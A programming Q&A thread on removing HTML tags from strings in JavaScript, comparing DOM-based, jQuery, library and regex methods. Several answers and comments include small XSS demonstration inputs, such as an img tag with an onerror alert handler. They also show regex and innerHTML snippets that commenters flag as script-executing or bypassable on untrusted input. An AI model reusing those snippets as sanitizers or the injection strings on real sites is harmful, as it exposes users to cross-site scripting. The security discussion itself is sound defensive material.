How to strip off HTML tags from a string using plain JavaScript only, not using a library?
46 Answers
If you're running in a browser, then the easiest way is just to let the browser do it for you...
function stripHtml(html)
{
   let tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}
Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.
myString.replace(/<[^>]*>?/gm, '');
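A quick way to see what this regex does and does not handle is to run it on a few inputs. The sketch below wraps the expression in a hypothetical helper named `stripTagsRegex` (the name and the sample strings are not from the answer). It illustrates the behaviour discussed in the comments, including the fact that a literal `<` in ordinary text is treated as the start of a tag; it is not a sanitizer.

```javascript
// Hypothetical helper wrapping the regex from the answer above.
function stripTagsRegex(input) {
  return input.replace(/<[^>]*>?/gm, '');
}

console.log(stripTagsRegex('<b>bold</b> text')); // "bold text"
console.log(stripTagsRegex('Foo <img src=x'));   // "Foo " (the unclosed tag is removed)
console.log(stripTagsRegex('3<4 and 5>2'));      // "32" (the literal "<" is treated as a tag start)
```

The last call shows why this approach is only suitable when the input is known not to contain a bare `<` in its text.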

-
@Mike, you should do the replacement after the string has actually been finished – nickf Dec 26 '10 at 15:48
-
that is not sufficient. If two different scripts do two different writes : `document.write('
/g, '');` and `document.write('')` then the second write closes the incomplete tag from the first. Also, `.` does not match `\n`, so your regex does not work on `'
'` which is a valid complete tag. – Mike Samuel Dec 27 '10 at 03:09
-
@MikeSamuel not quite sure your fix works correctly on the problem you suggested. If the problem you proposed is that two different writes hold parts of one tag, e.g. the first "
blablabla
". Then while your regex will erase the first string completely, it will ignore the initial > bracket in the second string. Did I understand your test case correctly? – Perishable Dave Sep 22 '11 at 17:46 -
2@PerishableDave, I agree that the `>` will be left in the second. That's not an injection hazard though. The hazard occurs due to `<` left in the first, which causes the HTML parser to be in a context other than [data state](http://www.w3.org/TR/html5/tokenization.html#data-state) when the second starts. Note there is no transition from data state on `>`. – Mike Samuel Sep 22 '11 at 18:04
-
123@MikeSamuel Did we decide on this answer yet? Naive user here ready to copy-paste. – Ziggy May 07 '13 at 18:32
-
1@Ziggy, no. This answer is still not safe even if you make the close `>` optional. Consider `""`. – Mike Samuel May 08 '13 at 00:24
-
3This also, I believe, gets completely confused if given something like `` Assuming correctly written HTML, you still need to take into account that a greater than sign might be somewhere in the quoted text in an attribute. Also you would want to remove all the text inside of ` – Jonathon Aug 18 '13 at 02:37
-
19@AntonioMax, I've answered this question [ad nauseam](http://stackoverflow.com/a/430240/20394), but to the substance of your question, because **security critical code shouldn't be copied & pasted.** You should download a library, and keep it up-to-date and patched so that you're secure against recently discovered vulnerabilities and to changes in browsers. – Mike Samuel Nov 27 '13 at 16:04
-
@MikeSamuel That was awesome. We're on the same page and your comment on that link is just right, thank you. – Antonio Max Nov 27 '13 at 21:59
-
Could you continue to loop through this expression until the text no longer contains any `<>`, assuming that the text you're trying to find doesn't have any either? – Vasu Jan 28 '14 at 23:39
-
1The solution shown above does not replace " ". The "jQuery(html).text();" does that job. – Benny Code Feb 24 '14 at 17:38
-
This answer is far better than others as I think anyone shall be able use and add other characters that they want or might want to remove. If any data is coming from database with escape characters like <, >, etc. The regular expression is the only way that is properly applicable in all the cases. – Abhishek Dhanraj Shahdeo Nov 08 '16 at 10:47
-
`m` in `/<(?:.|\n)*?>/gm` is not needed because you don't use `^` and `$` inside the regex. See [*"The multiline mode is enabled by the flag /.../m. It only affects the behavior of ^ and $."*](https://javascript.info/regexp-multiline-mode). I've tested and it works without `m`. – tanguy_k May 16 '19 at 12:40
-
2Would be nice to have some explanations (what cases it handles, limitations, explanations about the regex itself...) and unit tests – tanguy_k May 16 '19 at 13:02
-
a simple character replace: `myString.replace(/[<]/g, '<').replace(/[>]/g, '>');` – SwiftNinjaPro Dec 15 '19 at 01:46
-
-
1how come no one pointed to https://stackoverflow.com/a/1732454/501765 yet? – törzsmókus Jan 22 '21 at 10:52
-
@MikeSamuel I do not think the `?` you added in `/<[^>]*>?/gm` is needed or even correct. Wouldn't it replace any `<` in the text? – Agostino Feb 18 '21 at 11:27
-
@Agostino. It's necessary if you want to remove the tag from `Foo
' in text that follows. – Mike Samuel Feb 19 '21 at 05:56 -
@MikeSamuel Will it also strip any literal `<` in the text, e.g. `3<4`? If so, I would at least add a note about this in the answer. – Agostino Feb 22 '21 at 10:25
-
You might want to decode html-entities in text after removing tags (e.g. &, ). This library can help you https://www.npmjs.com/package/html-entities – Vincente Dec 15 '21 at 17:02
-
I would like to share an edited version of Shog9's accepted answer.
As Mike Samuel pointed out in a comment, that function can execute inline JavaScript code.
But Shog9 is right when saying "let the browser do it for you...",
so here is my edited version, using DOMParser:
function strip(html){
   let doc = new DOMParser().parseFromString(html, 'text/html');
   return doc.body.textContent || "";
}
Here is the code to test the inline JavaScript:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Also, it does not request resources (such as images) while parsing:
strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")
-
1This is not strip tags, but more like PHP htmlspecialchars(). Still useful for me. – Daantje Sep 14 '18 at 19:38
-
1Note that this also removes whitespace from the beginning of the text. – Raine Revere Apr 11 '19 at 15:48
-
-
2also, it does not try to [parse html using regex](https://stackoverflow.com/a/1732454/501765) – törzsmókus Jan 22 '21 at 10:53
-
6This should be the accepted answer because it's the safest and fastest way to do – the_previ Oct 06 '21 at 12:00
-
What does the or in the return does? Looks like this function will return a boolean. – Ronen Festinger Dec 06 '22 at 20:02
-
It won't return a boolean; it will return `doc.body.textContent` if it is truthy, or `""` otherwise, i.e. the first item that is true when turned into a boolean. – Ian Kim Feb 24 '23 at 15:19
-
This doesn't seem to strip HTML tags recursively. How can I recursively parse HTML into text? Thanks. – Teddy C Mar 13 '23 at 04:31
-
We have used this, but found that it doesn't work with sth like `\">`. Calling strip() recursively in case some tags still exists fixes that https://stackoverflow.com/a/76424919/15266227 – Samuel Eiche Jun 07 '23 at 15:34
Simplest way:
jQuery(html).text();
That retrieves all the text from a string of html.
-
114We always use jQuery for projects since invariably our projects have a lot of Javascript. Therefore we didn't add bulk, we took advantage of existing API code... – Mark Mar 14 '12 at 16:31
-
40You use it, but the OP might not. the question was about Javascript NOT JQuery. – Rafael Herscovici Mar 14 '12 at 16:55
-
2If you are using CKEditor, you already have jQuery loading. But to get all of the actual characters for an accurate count, you need to trim the result: chars = jQuery(editor.getData()).text().trim()) – Benxamin Nov 02 '12 at 14:30
-
119It's still a useful answer for people who need to do the same thing as the OP (like me) and don't mind using jQuery (like me), not to mention, it could have been useful to the OP if they were considering using jQuery. The point of the site is to share knowledge. Keep in mind that the chilling effect you might have by chastising useful answers without good reason. – acjay Nov 29 '12 at 01:32
-
31@Dementic shockingly, I find the threads with multiple answers to be the most useful, because often a secondary answer meets my exact needs, while the primary answer meets the general case. – Eric G Dec 14 '12 at 19:11
-
38That will not work if you some part of string is not wrapped in html tag. e.g. "Error: Please enter a valid email" will return only "Error:" – Aamir Afridi Feb 05 '13 at 11:10
-
18The comment by Mike Samuel above applies here as well. Don't use this with HTML from an untrusted source. To see why, try running `jQuery("
").text();` – Janne Aukia Feb 12 '13 at 08:38
-
2@dementic: in the tags there is also jQuery, so I do not see why this would not be a valid answer.. +1 helped me – Igor L. Feb 26 '13 at 10:48
-
1@IgorLacik - if you check the edits, when i wrote the comment Jquery was not in the tags, it was added because of the jquery answers. – Rafael Herscovici Feb 26 '13 at 11:22
-
16You should wrap it in a HTML element to make it valid for text strings as well: `$('').html(html).text()`. This will also work backend in node.js. – David Hellsing Apr 22 '13 at 08:39
-
@JanneAukia I was curious so I made a fiddle. http://jsfiddle.net/gPdZm/1/ I would expect the alert to be run twice: once when the page loads, and then once more when we evaluate the untrusted JS. Is that not right? Or does the alert only fire the first time it is evaluated by anything? – Ziggy May 07 '13 at 19:31
-
1This is not effective performance wise since it will create a dom element first which would trigger the loading of images if any. Stripping the html text suggested by @nickf is a better idea. – agaase Aug 20 '13 at 12:46
-
1This will not turn `
` into '"\r\n"', so a multiline text may be broken if you run just that code. For single line text it should be ok, though. – Geeky Guy Oct 29 '13 at 13:01 -
I tried this with
and the javascript still executes even though the image tags are stripped. – Nile May 04 '14 at 00:42
-
3works with angular as well: `angular.element(html).text();` (the actual call is delegated to jquery lite) – Vitalii Fedorenko May 06 '15 at 19:59
-
3This will not work if 'html' has plain string. e.g `jQuery("abc").text()` will output "abc". However `jQuery("abc").text()` will output "" (expected abc) – Raja Ehtesham Jun 23 '16 at 00:47
-
in case it's dynamic, $('some string').text() gives "" (empty string) – Prashant Nov 16 '17 at 11:36
-
The question asks about javascript. Jquery is not javascript, jquery is a javascript library. – ajimix Jan 14 '19 at 14:05
-
This answer was written over 10 years ago when jQuery was likely in wider use. I updated the question to more accurately reflect the original intent. That will make this answer obsolete and should be deleted. However it is historically useful and should be left as a comment. – JGallardo Jun 06 '23 at 23:55
As an extension to the jQuery method, if your string might not contain HTML (e.g. if you are trying to remove HTML from a form field),
jQuery(html).text();
will return an empty string if there is no HTML.
Use:
jQuery('<p>' + html + '</p>').text();
instead.
Update:
As has been pointed out in the comments, in some circumstances this solution will execute JavaScript contained within html. If the value of html could be influenced by an attacker, use a different solution.

Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact
The above function posted by hypoxide works fine, but I was after something that would convert HTML created in a web rich-text editor (for example FCKEditor) and clear out all HTML but leave all the links, because I wanted both the HTML and the plain text version to help create the correct parts of an SMTP email (both HTML and plain text).
After a long time searching Google, my colleagues and I came up with this using the regex engine in JavaScript:
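str='this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>';
// replace <br> tags with a newline
str=str.replace(/<br>/gi, "\n");
// replace opening <p> tags (with or without attributes) with a newline
str=str.replace(/<p(\s[^>]*)?>/gi, "\n");
// keep the link text and append the URL
str=str.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
// remove every remaining tag
str=str.replace(/<(?:.|\s)*?>/g, "");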
The str variable starts out like this:
this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>
and then after the code has run it looks like this:-
this string has html code i want to remove
Link Number 1 -> BBC (Link->http://www.bbc.co.uk) Link Number 1
Now back to normal text and stuff
As you can see, all the HTML has been removed and the link has been preserved, with the hyperlinked text still intact. I have also replaced the <p> and <br> tags with \n (newline char) so that some sort of visual formatting is retained.
To change the link format (e.g. BBC (Link->http://www.bbc.co.uk)), just edit the $2 (Link->$1), where $1 is the href URL/URI and $2 is the hyperlinked text. With the links directly in the body of the plain text, most SMTP mail clients convert them so the user can click on them.
Hope you find this useful.

An improvement to the accepted answer.
function strip(html)
{
   var tmp = document.implementation.createHTMLDocument("New").body;
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}
This way something running like this will do no harm:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Firefox, Chromium and Internet Explorer 9+ are safe. Opera Presto is still vulnerable. Also, images mentioned in the string are not downloaded in Chromium and Firefox, which saves HTTP requests.

-
1That doesn't run any scripts here in Chromium/Opera/Firefox on Linux, so why isn't it safe? – Janghou Apr 22 '16 at 10:37
-
My apologies, I must have miss-tested, I probably forgot to click run again on the jsFiddle. – Arth Apr 22 '16 at 10:59
-
-
According to the [specs](https://developer.mozilla.org/en-US/docs/Web/API/DOMImplementation/createHTMLDocument) it's optional nowadays, but it wasn't always. – Janghou Dec 15 '16 at 12:38
-
This should do the work on any Javascript environment (NodeJS included).
const text = `
<html lang="en">
<head>
<style type="text/css">*{color:red}</style>
<script>alert('hello')</script>
</head>
<body><b>This is some text</b><br/></body>
</html>`;
const stripped = text
    // Remove style tags and content
    .replace(/<style[^>]*>[\s\S]*?<\/style>/g, '')
    // Remove script tags and content
    .replace(/<script[^>]*>[\s\S]*?<\/script>/g, '')
    // Remove all opening, closing and orphan HTML tags
    .replace(/<[^>]+>/g, '')
    // Remove leading spaces and repeated CR/LF
    .replace(/([\r\n]+ +)+/g, '');

-
@pstanton I have fixed the code and added comments, sorry for the late response. – Karl.S Nov 01 '19 at 17:50
-
please consider reading these caveats: https://stackoverflow.com/a/1732454/501765 – törzsmókus Jan 22 '21 at 10:54
-
1Since there are no start of string or end of string anchors, the `m` pattern modifier is pointless. Since the first two patterns have common starts and finished, perhaps consolidate them by capturing the tagname and then using a backreference for the ending tag. – mickmackusa Apr 03 '23 at 01:20
-
@mickmackusa indeed, apart of that using a XML parser is the best way to strip out the tags you want as törzsmókus commented above. – Karl.S Jul 06 '23 at 23:20
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
This is a regex version, which is more resilient to malformed HTML, like:
Unclosed tags
Some text <img
"<", ">" inside tag attributes
Some text <img alt="x > y">
Newlines
Some <a
href="http://google.com">
The code
var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
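To make the three malformed cases listed above concrete, here is a small sketch that runs the same regex on each of them. The wrapper name `stripTagsTolerant` is hypothetical and only there so the calls are easy to read; the third input adds link text and a closing tag to the answer's newline example.

```javascript
// Hypothetical wrapper around the regex shown above.
function stripTagsTolerant(html) {
  return html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, '');
}

// Unclosed tag at the end of the string
console.log(stripTagsTolerant('Some text <img'));              // "Some text "
// ">" inside a quoted attribute value
console.log(stripTagsTolerant('Some text <img alt="x > y">')); // "Some text "
// Newline inside a tag
console.log(stripTagsTolerant('Some <a\nhref="http://google.com">link</a>')); // "Some link"
```

Quoted attribute values are matched as a unit before the fallback `[^>]`, which is why a `>` inside quotes does not end the tag early.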

-
How could you flip this to do literally the opposite? I want to use `string.replace()` on ONLY the text part, and leave any HTML tags and their attributes unchanged. – Ade Sep 06 '21 at 15:20
-
2My personal favourite, I would also add to remove newlines like: `const deTagged = myString.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, ''); const deNewlined = deTagged.replace(/\n/g, '');` – Leigh Mathieson Jan 19 '22 at 15:07
I altered Jibberboy2000's answer to include several <BR /> tag formats, remove everything inside <SCRIPT> and <STYLE> tags, format the resulting HTML by removing multiple line breaks and spaces, and convert some HTML-encoded characters back to normal. After some testing it appears that you can convert most full web pages into simple text where the page title and content are retained.
In the simple example,
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--comment-->
<head>
<title>This is my title</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
body {margin-top: 15px;}
a { color: #D80C1F; font-weight:bold; text-decoration:none; }
</style>
</head>
<body>
<center>
This string has <i>html</i> code i want to <b>remove</b><br>
In this line <a href="http://www.bbc.co.uk">BBC</a> with link is mentioned.<br/>Now back to "normal text" and stuff using <html encoding>
</center>
</body>
</html>
becomes
This is my title
This string has html code i want to remove
In this line BBC (http://www.bbc.co.uk) with link is mentioned.
Now back to "normal text" and stuff using
The JavaScript function and test page look like this:
function convertHtmlToText() {
var inputText = document.getElementById("input").value;
var returnText = "" + inputText;
//-- remove BR tags and replace them with line break
returnText=returnText.replace(/<br>/gi, "\n");
returnText=returnText.replace(/<br\s\/>/gi, "\n");
returnText=returnText.replace(/<br\/>/gi, "\n");
//-- remove P and A tags but preserve what's inside of them
returnText=returnText.replace(/<p.*>/gi, "\n");
returnText=returnText.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 ($1)");
//-- remove all inside SCRIPT and STYLE tags
returnText=returnText.replace(/<script.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/script>/gi, "");
returnText=returnText.replace(/<style.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/style>/gi, "");
//-- remove all else
returnText=returnText.replace(/<(?:.|\s)*?>/g, "");
//-- get rid of more than 2 multiple line breaks:
returnText=returnText.replace(/(?:(?:\r\n|\r|\n)\s*){2,}/gim, "\n\n");
//-- get rid of more than 2 spaces:
returnText = returnText.replace(/ +(?= )/g,'');
//-- get rid of html-encoded characters (&amp; is decoded last so that text such as &amp;lt; is not decoded twice):
returnText=returnText.replace(/&nbsp;/gi," ");
returnText=returnText.replace(/&quot;/gi,'"');
returnText=returnText.replace(/&lt;/gi,'<');
returnText=returnText.replace(/&gt;/gi,'>');
returnText=returnText.replace(/&amp;/gi,"&");
//-- return
document.getElementById("output").value = returnText;
}
It was used with this HTML:
<textarea id="input" style="width: 400px; height: 300px;"></textarea><br />
<button onclick="convertHtmlToText()">CONVERT</button><br />
<textarea id="output" style="width: 400px; height: 300px;"></textarea><br />
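The function above decodes a handful of HTML entities with one `replace` call per entity. A possible alternative, sketched below, decodes them in a single pass through a lookup table, so the result of one replacement is never scanned again by the next. The table `ENTITIES` and the function `decodeBasicEntities` are hypothetical names introduced for illustration, and the table is deliberately tiny; it is nowhere near a complete entity decoder.

```javascript
// Minimal sketch: decode a few named entities in one pass.
// The table is an assumption for illustration. Like the function above,
// it maps &nbsp; to a regular space rather than U+00A0.
const ENTITIES = { nbsp: ' ', amp: '&', quot: '"', lt: '<', gt: '>' };

function decodeBasicEntities(text) {
  return text.replace(/&(nbsp|amp|quot|lt|gt);/gi, function (match, name) {
    return ENTITIES[name.toLowerCase()];
  });
}

console.log(decodeBasicEntities('a &lt; b &amp;&amp; c &gt; d')); // "a < b && c > d"
console.log(decodeBasicEntities('&amp;lt;'));                      // "&lt;" (not decoded twice)
```

For anything beyond these few entities, a dedicated library such as the ones mentioned in the comments is probably the safer choice.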

-
1I like this solution because it has treatment of html special characters... but still not nearly enough of them... the best answer for me would deal with all of them. (which is probably what jquery does). – Daniel Gerson Oct 17 '12 at 13:17
-
Note that to remove all `
` tags you could use a good regular expression instead: `/
/` that way you have just one replace instead of 3. Also it seems to me that except for the decoding of entities you can have a single regex, something like this: `/<[a-z].*?\/?>/`. – Alexis Wilke Jan 14 '16 at 07:11 -
Nice script. But what about table content? Any idea how can it be displayed – Hristo Enev Aug 16 '17 at 12:14
-
@DanielGerson, encoding html gets real hairy, real quick, but the [best approach seems to be using the he library](https://stackoverflow.com/a/57702435/1366033) – KyleMit Aug 29 '19 at 03:04
-
this fuction has a lot if itinerations which might lead to a memory leak in multiple instances of long texts. – Matías Fork Jul 02 '20 at 17:15
from CSS tricks:
https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
const originalString = `
<div>
<p>Hey that's <span>somthing</span></p>
</div>
`;
const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");
console.log(strippedString);

Another, admittedly less elegant solution than nickf's or Shog9's, would be to recursively walk the DOM starting at the <body> tag and append each text node.
var bodyContent = document.getElementsByTagName('body')[0];
var result = appendTextNodes(bodyContent);
function appendTextNodes(element) {
    var text = '';
    // Loop through the childNodes of the passed in element
    for (var i = 0, len = element.childNodes.length; i < len; i++) {
        // Get a reference to the current child
        var node = element.childNodes[i];
        // Append the node's value if it's a text node
        if (node.nodeType == 3) {
            text += node.nodeValue;
        }
        // Recurse through the node's children, if there are any, and append their text
        if (node.childNodes.length > 0) {
            text += appendTextNodes(node);
        }
    }
    // Return the final result
    return text;
}

-
3yikes. if you're going to create a DOM tree out of your string, then just use shog's way! – nickf May 04 '09 at 23:21
-
Yes, my solution wields a sledge-hammer where a regular hammer is more appropriate :-). And I agree that yours and Shog9's solutions are better, and basically said as much in the answer. I also failed to reflect in my response that the html is already contained in a string, rendering my answer essentially useless as regards the original question anyway. :-( – Bryan May 05 '09 at 00:08
-
1To be fair, this has value - if you absolutely must preserve /all/ of the text, then this has at least a decent shot at capturing newlines, tabs, carriage returns, etc... Then again, nickf's solution should do the same, and do much faster... eh. – Shog9 May 05 '09 at 04:58
If you want to keep the links and the structure of the content (h1, h2, etc.) then you should check out TextVersionJS. You can use it with any HTML, although it was created to convert an HTML email to plain text.
The usage is very simple. For example in node.js:
var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
Or in the browser with pure js:
<script src="textversion.js"></script>
<script>
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
</script>
It also works with require.js:
define(["textversionjs"], function(createTextVersion) {
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
});

const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)

-
doesn't work in next js as it is server side rendered but nice solution for traditional applications. use this instead - const strippedString = originalString.replace(/(<([^>]+)>)/gi, ""); – Pawan Deore Jan 06 '23 at 12:51
It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:
var htmlparser = require('htmlparser2');
var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';
var result = [];
var parser = new htmlparser.Parser({
ontext: function(text){
result.push(text);
}
}, {decodeEntities: true});
parser.write(body);
parser.end();
result.join('');
The output will be This is a simple example.
See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html
This works in both node and the browser if you pack your web application using a tool like webpack.

For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");

-
Which characters in your pattern are made case-insensitive by that `i` pattern modifier? I see no need for capturing parentheses -- anywhere in the pattern. Bad copy-pasta? Maybe someone should whisper to Chris Coyier. – mickmackusa Apr 03 '23 at 01:24
A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.
function removeTags(string, array){
return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
function f(array, value){
return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
}
}
var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>

After trying the answers mentioned, I found that most if not all of them had edge cases and couldn't completely support my needs.
I started exploring how PHP does it and came across the php.js lib, which replicates the strip_tags method here: http://phpjs.org/functions/strip_tags/

-
This is a neat function and well documented. However, it can be made faster when `allowed == ''` which I think is what the OP asked for, which is nearly what Byron answered below (Byron only got the `[^>]` wrong.) – Alexis Wilke Jan 14 '16 at 08:08
-
1If you use the `allowed` param you are vulnerable to XSS: `stripTags('
mytext
', '')` returns `
mytext
` – Chris Cinelli Feb 20 '16 at 01:26
function stripHTML(my_string){
var charArr = my_string.split(''),
resultArr = [],
htmlZone = 0,
quoteZone = 0;
for( var x=0; x < charArr.length; x++ ){
switch( charArr[x] + htmlZone + quoteZone ){
case "<00" : htmlZone = 1;break;
case ">10" : htmlZone = 0;resultArr.push(' ');break;
case '"10' : quoteZone = 1;break;
case "'10" : quoteZone = 2;break;
case '"11' :
case "'12" : quoteZone = 0;break;
default : if(!htmlZone){ resultArr.push(charArr[x]); }
}
}
return resultArr.join('');
}
Accounts for > inside attributes and <img onerror="javascript"> in newly created DOM elements.
usage:
clean_string = stripHTML("string with <html> in it")
demo:
https://jsfiddle.net/gaby_de_wilde/pqayphzd/
demo of top answer doing the terrible things:
-
You'll need to handle escaped quotes inside an attribute value too (e.g. `string with this text should be removed, but is not">example`). – Logan Pickup Oct 25 '17 at 22:00
I made some modifications to the original Jibberboy2000 script. Hope it'll be useful for someone.
str = '**ANY HTML CONTENT HERE**';
str=str.replace(/<\s*br\/*>/gi, "\n");
str=str.replace(/<\s*a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<\s*\/*.+?>/ig, "\n");
str=str.replace(/ {2,}/gi, " ");
str=str.replace(/\n+\s*/gi, "\n\n");

Here's a version which sorta addresses @MikeSamuel's security concern:
function strip(html)
{
try {
var doc = document.implementation.createDocument('http://www.w3.org/1999/xhtml', 'html', null);
doc.documentElement.innerHTML = html;
return doc.documentElement.textContent||doc.documentElement.innerText;
} catch(e) {
return "";
}
}
Note, it will return an empty string if the HTML markup isn't valid XML (i.e., tags must be closed and attributes must be quoted). This isn't ideal, but it does avoid the security exploit potential.
If you need to handle markup that is not valid XML, you could try using:
var doc = document.implementation.createHTMLDocument("");
but that isn't a perfect solution either, for other reasons.

-
That will fail in many circumstances if the text comes from user input (textarea or contenteditable widget...) – Alexis Wilke Jan 14 '16 at 07:12
I just needed to strip out the <a> tags and replace them with the text of the link.
This seems to work great.
htmlContent= htmlContent.replace(/<a.*href="(.*?)">/g, '');
htmlContent= htmlContent.replace(/<\/a>/g, '');

-
This only applies for a tags and needs tweaking for being a wide function. – m3nda Jan 06 '16 at 11:03
-
Yeah, plus an anchor tag could have many other attributes such as the `title="..."`. – Alexis Wilke Jan 14 '16 at 07:58
Below code allows you to retain some html tags while stripping all others
function strip_tags(input, allowed) {
allowed = (((allowed || '') + '')
.toLowerCase()
.match(/<[a-z][a-z0-9]*>/g) || [])
.join(''); // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)
var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi;
return input.replace(commentsAndPhpTags, '')
.replace(tags, function($0, $1) {
return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : '';
});
}
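A short usage sketch for the function above, repeated here only so the snippet runs on its own; the sample strings are made up. The last call illustrates the caveat raised in the comment below: when a tag is allowed, it is kept verbatim, attributes included, so the `allowed` parameter should not be relied on for untrusted input.

```javascript
// Same function as in the answer, copied so the example is self-contained.
function strip_tags(input, allowed) {
  allowed = (((allowed || '') + '')
    .toLowerCase()
    .match(/<[a-z][a-z0-9]*>/g) || [])
    .join(''); // e.g. "<a><b><c>"
  var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
    commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi;
  return input.replace(commentsAndPhpTags, '')
    .replace(tags, function ($0, $1) {
      return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : '';
    });
}

var sample = '<p>Hello <b>world</b> <i>!</i></p>';
console.log(strip_tags(sample));        // "Hello world !"
console.log(strip_tags(sample, '<b>')); // "Hello <b>world</b> !"

// Allowed tags keep their attributes, including event handlers.
console.log(strip_tags('<b onclick="x()">hi</b>', '<b>')); // '<b onclick="x()">hi</b>'
```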

-
1You should quote the source (`phpjs`). If you use the `allowed` param you are vulnerable to XSS: `stripTags('
mytext
', '')` returns `
mytext
` – Chris Cinelli Feb 20 '16 at 01:25
The accepted answer works fine mostly; however, in IE, if the html string is null you get "null" (instead of ''). Fixed:
function strip(html)
{
if (html == null) return "";
var tmp = document.createElement("DIV");
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}

I think the easiest way is to just use Regular Expressions as someone mentioned above. Although there's no reason to use a bunch of them. Try:
stringWithHTML = stringWithHTML.replace(/<\/?[a-z][a-z0-9]*[^<>]*>/ig, "");

-
14Don't do this if you care about security. If the user input is this: '
ipt>alert(42); ipt>' then the stripped version will be this: ''. So this is an XSS vulnerability. – molnarg Mar 06 '13 at 12:38 -
You should change the `[^<>]` with `[^>]` because a valid tag cannot include a `<` character, then the XSS vulnerability disappears. – Alexis Wilke Jan 14 '16 at 08:00
A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.
function stripHtml(unsafe) {
return $($.parseHTML(unsafe)).text();
}
Can safely strip html from:
<img src="unknown.gif" onerror="console.log('running injections');">
And other exploits.
nJoy!
const strip = (text) => {
    return new DOMParser().parseFromString(text, "text/html").body?.textContent ?? "";
}
const value=document.getElementById("idOfEl").value
const cleanText=strip(value)

A very good library is sanitize-html, which is written in pure JavaScript and can be used in any environment.
In my case, on React Native, I needed to remove all HTML tags from the given texts, so I created this wrapper function:
import sanitizer from 'sanitize-html';
const textSanitizer = (textWithHTML: string): string =>
sanitizer(textWithHTML, {
allowedTags: [],
});
export default textSanitizer;
Now, by using my textSanitizer, I can get the plain text content.

I have created a working regular expression myself:
str=str.replace(/(<\?[a-z]*(\s[^>]*)?\?(>|$)|<!\[[a-z]*\[|\]\]>|<!DOCTYPE[^>]*?(>|$)|<!--[\s\S]*?(-->|$)|<[a-z?!\/]([a-z0-9_:.])*(\s[^>]*)?(>|$))/gi, '');

simple 2 line jquery to strip the html.
var content = "<p>checking the html source </p><p>\n</p><p>with </p><p>all</p><p>the html </p><p>content</p>";
var text = $(content).text();//It gets you the plain text
console.log(text);//check the data in your console
cj("#text_area_id").val(text);//set your content to text area using text_area_id

Using Jquery:
function stripTags(textToEscape) {
    return $('<p></p>').html(textToEscape).text()
}

An input element supports only one line of text:
The text state represents a one line plain text edit control for the element's value.
function stripHtml(str) {
var tmp = document.createElement('input');
tmp.value = str;
return tmp.value;
}
Update: this works as expected
function stripHtml(str) {
// Remove some tags
str = str.replace(/<[^>]+>/gim, '');
// Remove BB code
str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');
// Remove html and line breaks
const div = document.createElement('div');
div.innerHTML = str;
const input = document.createElement('input');
input.value = div.textContent || div.innerText || '';
return input.value;
}

-
